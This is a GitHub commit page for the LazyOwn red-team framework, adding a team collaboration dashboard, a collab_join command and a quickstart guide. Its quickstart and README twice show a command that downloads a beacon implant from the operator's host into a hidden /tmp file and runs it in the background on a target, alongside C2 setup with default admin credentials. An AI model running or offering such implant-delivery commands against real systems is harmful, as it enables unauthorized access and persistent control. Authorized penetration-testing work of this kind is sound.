Skip to content

Commit 797745e

Browse files
committed
feat(feat): gap2 team server UI and gap3 onboarding quickstart \n\n Version: release/0.2.118 \n\n add collab.html team dashboard, collab_join CLI cmd, QUICKSTART.md and 67 tests \n\n LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/ https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: vie 15 may 2026 16:07:58 -04 \n\n Hora: 1778875678
1 parent 6af4a81 commit 797745e

13 files changed

Lines changed: 3793 additions & 2639 deletions

CHANGELOG.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,13 @@
22
# Changelog
33

44

5+
### Nuevas características
6+
7+
### Otros
8+
9+
* * feat(feat): gap2 team server UI and gap3 onboarding quickstart \n\n Version: release/0.2.118 \n\n add collab.html team dashboard, collab_join CLI cmd, QUICKSTART.md and 67 tests \n\n LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/ https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: vie 15 may 2026 16:07:58 -04 \n\n Hora: 1778875678
10+
11+
512
### Nuevas características
613

714
### Otros

COMMANDS.md

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -501,6 +501,22 @@ the package is missing the command prints an install hint and returns.
501501
:type line: str
502502
:return: None
503503

504+
## collab_join
505+
Print the multi-operator collaboration join URL and SSE endpoint.
506+
507+
Outputs the URL teammates need to open in a browser to connect to the
508+
shared operator dashboard at /collab/ and the curl command to consume
509+
the SSE event stream from a terminal.
510+
511+
Usage:
512+
``collab_join`` — print join URL for current lhost/c2_port
513+
``collab_join alice`` — print URL with operator handle pre-filled
514+
``collab_join alice --curl`` — also print the curl SSE command
515+
516+
:param line: Optional operator handle and flags.
517+
:type line: str
518+
:return: None
519+
504520
## complete_palette
505521
Tab-complete the palette command using the live command index.
506522

QUICKSTART.md

Lines changed: 167 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,167 @@
1+
# LazyOwn — 5-Minute Quickstart
2+
3+
Everything you need to go from a fresh clone to an active engagement in under five minutes.
4+
5+
## Prerequisites
6+
7+
- Kali Linux / Parrot OS (or any Debian-based distro)
8+
- Python 3.10+
9+
- `git`, `make`, `gcc`
10+
- SecLists at `/usr/share/seclists` (or `/usr/share/wordlists/SecLists-master`)
11+
12+
```bash
13+
sudo apt install -y seclists 2>/dev/null || true
14+
```
15+
16+
---
17+
18+
## Step 1 — Clone and install
19+
20+
```bash
21+
git clone https://github.com/grisuno/LazyOwn.git
22+
cd LazyOwn
23+
bash install.sh
24+
```
25+
26+
`install.sh` creates the virtualenv at `env/`, installs all Python deps, and
27+
generates `cert.pem` / `key.pem` for the C2.
28+
29+
---
30+
31+
## Step 2 — Run the guided setup wizard
32+
33+
```bash
34+
./run
35+
```
36+
37+
On first launch you will be prompted to run `wizard`. Accept.
38+
The wizard auto-detects your `lhost` from the routing table, walks you through
39+
7 steps (target IP, attacker IP, domain, network device, OS type, Groq API key,
40+
SecLists paths), and writes everything to `payload.json`.
41+
42+
```
43+
(LazyOwn) > wizard
44+
```
45+
46+
Or run the readiness check without changing anything:
47+
48+
```
49+
(LazyOwn) > wizard --check
50+
```
51+
52+
---
53+
54+
## Step 3 — Start recon
55+
56+
```bash
57+
(LazyOwn) > ping # confirm target is alive
58+
(LazyOwn) > lazynmap # full port scan → sessions/scan_<rhost>.nmap
59+
(LazyOwn) > auto_populate # parse scan output into world_model.json
60+
(LazyOwn) > facts_show # see what was discovered
61+
```
62+
63+
---
64+
65+
## Step 4 — Start the C2
66+
67+
In a second terminal:
68+
69+
```bash
70+
bash fast_run_as_r00t.sh --no-attach --vpn 1
71+
```
72+
73+
Or start it inline from the shell:
74+
75+
```bash
76+
(LazyOwn) > lazyc2
77+
```
78+
79+
The C2 starts at `https://<lhost>:<c2_port>` with the credentials from
80+
`payload.json` (`c2_user` / `c2_pass`, default `admin` / `admin`).
81+
82+
---
83+
84+
## Step 5 — Get your first shell
85+
86+
```bash
87+
# Generate and deliver the Go beacon (two-stage, XOR-encoded)
88+
(LazyOwn) > lazymsfvenom # or use the beacon lazyaddon for a C implant
89+
90+
# Or drop the Linux C beacon with BOF support
91+
(LazyOwn) > blacksandbeacon # compile → sessions/blacksandbeacon
92+
# Then run on target:
93+
# curl -sk "http://<lhost>:<lport>/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &
94+
```
95+
96+
Once a beacon checks in, manage it from the C2 dashboard at
97+
`https://<lhost>:<c2_port>`.
98+
99+
---
100+
101+
## Step 6 (optional) — Invite teammates
102+
103+
```bash
104+
(LazyOwn) > collab_join alice
105+
```
106+
107+
Prints the team dashboard URL and SSE stream endpoint. Share the URL with
108+
your team. Everyone connects to `https://<lhost>:<c2_port>/collab/?operator=<handle>`.
109+
110+
The collaboration layer provides:
111+
- Real-time event broadcast via SSE (findings, commands, phase changes)
112+
- Advisory target locks (prevents two operators running tools against the same host)
113+
- Operator presence registry
114+
- Chat broadcast
115+
116+
---
117+
118+
## Common first-session commands
119+
120+
| Goal | Command |
121+
|---|---|
122+
| Set target | `assign rhost 10.10.11.5` |
123+
| Set attacker IP | `assign lhost 10.10.14.3` |
124+
| Full wizard | `wizard` |
125+
| Port scan | `lazynmap` |
126+
| Web enum | `gobuster` |
127+
| SMB enum | `enum4linux` |
128+
| Check what to do next | `recommend_next` |
129+
| Phase guide | `phase_guide recon` |
130+
| AI next step | `auto_loop` |
131+
| Team join URL | `collab_join <handle>` |
132+
| Payload dashboard | `dashboard` |
133+
134+
---
135+
136+
## Key files
137+
138+
| File | Purpose |
139+
|---|---|
140+
| `payload.json` | Single source of truth — all config lives here |
141+
| `sessions/scan_<ip>.nmap` | Nmap output — read before re-scanning |
142+
| `sessions/world_model.json` | Current phase, discovered hosts, creds |
143+
| `sessions/credentials*.txt` | Captured credentials |
144+
| `sessions/LazyOwn_session_report.csv` | Full command history |
145+
146+
---
147+
148+
## Troubleshooting
149+
150+
**`wizard` can't detect lhost** — run `ip route` and set it manually:
151+
```
152+
(LazyOwn) > assign lhost 10.10.14.3
153+
```
154+
155+
**C2 TLS errors** — regenerate certs:
156+
```bash
157+
bash gen_cert.sh
158+
```
159+
160+
**Nmap taking too long** — check `sessions/scan_<rhost>.nmap` first; it may
161+
already exist from a previous run. `facts_show` reads it without rescanning.
162+
163+
**Missing SecLists** — install with `sudo apt install seclists` or set
164+
`dirwordlist` manually:
165+
```
166+
(LazyOwn) > assign dirwordlist /path/to/wordlist.txt
167+
```

README.md

Lines changed: 104 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -61,7 +61,80 @@ Connect Claude Code to the LazyOwn framework via the Model Context Protocol (MCP
6161
| `skills/lazyown_facts.py` | Structured fact extraction from nmap XML and tool output |
6262
| `skills/lazyown_parquet_db.py` | Parquet knowledge base: session history, GTFOBins, LOLBas, ATT&CK |
6363

64-
## Quick Start
64+
## Quick Start (5 minutes to first shell)
65+
66+
> Full guide: [`QUICKSTART.md`](QUICKSTART.md)
67+
68+
```bash
69+
# 1. Clone and install
70+
git clone https://github.com/grisuno/LazyOwn.git && cd LazyOwn && bash install.sh
71+
72+
# 2. Launch and run the wizard (auto-detects lhost, walks 7 config steps)
73+
./run
74+
(LazyOwn) > wizard
75+
76+
# 3. Recon
77+
(LazyOwn) > ping && lazynmap && auto_populate && facts_show
78+
79+
# 4. Start C2 (separate terminal)
80+
bash fast_run_as_r00t.sh --no-attach --vpn 1
81+
82+
# 5. Get a shell — Linux BOF-capable beacon
83+
(LazyOwn) > blacksandbeacon
84+
# Then on target: curl -sk "http://<lhost>:<lport>/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &
85+
86+
# 6. Invite teammates (multi-operator)
87+
(LazyOwn) > collab_join alice
88+
# Prints: https://<lhost>:<c2_port>/collab/?operator=alice
89+
```
90+
91+
---
92+
93+
## Multi-Operator Collaboration
94+
95+
LazyOwn's collab layer provides real-time team server functionality via
96+
Server-Sent Events (SSE). It activates automatically when `lazyc2.py` starts.
97+
98+
**Browser dashboard** — open in any browser on the team:
99+
```
100+
https://<lhost>:<c2_port>/collab/?operator=<your_handle>
101+
```
102+
103+
**Terminal SSE stream**:
104+
```bash
105+
curl --insecure -N "https://<lhost>:<c2_port>/collab/stream?operator=alice" | jq .
106+
```
107+
108+
**Publish a finding to all operators**:
109+
```bash
110+
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/publish \
111+
-H "Content-Type: application/json" \
112+
-d '{"type":"finding","operator":"alice","payload":{"target":"10.10.11.5","detail":"root via CVE-2024-xxxx"}}'
113+
```
114+
115+
**Lock a target** (prevents two operators running the same tool):
116+
```bash
117+
curl --insecure -sk -X POST https://<lhost>:<c2_port>/collab/lock \
118+
-H "Content-Type: application/json" \
119+
-d '{"target":"10.10.11.5","operator":"alice","ttl_secs":300}'
120+
```
121+
122+
| Endpoint | Method | Description |
123+
|---|---|---|
124+
| `/collab/` | GET | Multi-operator browser dashboard |
125+
| `/collab/stream?operator=<name>` | GET (SSE) | Real-time event stream |
126+
| `/collab/operators` | GET | Active operator list |
127+
| `/collab/publish` | POST | Broadcast a structured event |
128+
| `/collab/lock` | POST | Acquire advisory target lock |
129+
| `/collab/unlock` | POST | Release target lock |
130+
| `/collab/locks` | GET | All active locks |
131+
| `/collab/history?n=100` | GET | Last N events |
132+
133+
From the CLI: `collab_join <handle>` prints all URLs for a given operator.
134+
135+
---
136+
137+
## MCP Quick Start
65138

66139
### 1. Register the MCP server
67140

@@ -3452,6 +3525,22 @@ the package is missing the command prints an install hint and returns.
34523525
:type line: str
34533526
:return: None
34543527

3528+
## collab_join
3529+
Print the multi-operator collaboration join URL and SSE endpoint.
3530+
3531+
Outputs the URL teammates need to open in a browser to connect to the
3532+
shared operator dashboard at /collab/ and the curl command to consume
3533+
the SSE event stream from a terminal.
3534+
3535+
Usage:
3536+
``collab_join`` — print join URL for current lhost/c2_port
3537+
``collab_join alice`` — print URL with operator handle pre-filled
3538+
``collab_join alice --curl`` — also print the curl SSE command
3539+
3540+
:param line: Optional operator handle and flags.
3541+
:type line: str
3542+
:return: None
3543+
34553544
## complete_palette
34563545
Tab-complete the palette command using the live command index.
34573546

@@ -12882,6 +12971,20 @@ No description available.
1288212971
# Changelog
1288312972

1288412973

12974+
### Nuevas características
12975+
12976+
### Otros
12977+
12978+
* * feat(feat): blacksandbeacon Linux BOF addon \n\n Version: release/0.2.117 \n\n add blacksandbeacon and blacksandbeacon_bof lazyaddons with 59 tests and README updates \n\n Modified file(s):\n- README.md - lazyaddons/blacksandbeacon.yaml - lazyaddons/blacksandbeacon_bof.yaml - tests/test_blacksandbeacon_addon.py\nCreated file(s):\n- lazyaddons/blacksandbeacon.yaml - lazyaddons/blacksandbeacon_bof.yaml - tests/test_blacksandbeacon_addon.py\n LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 \n\n LazyOwn/ https://grisuno.github.io/LazyOwn/ \n\n \n\n Fecha: vie 15 may 2026 14:02:09 -04 \n\n Hora: 1778868129
12979+
12980+
12981+
### Nuevas características
12982+
12983+
### Otros
12984+
12985+
* * feat(c2): add blacksandbeacon lazyaddon with Linux BOF support
12986+
12987+
1288512988
### Nuevas características
1288612989

1288712990
### Otros

0 commit comments

Comments
 (0)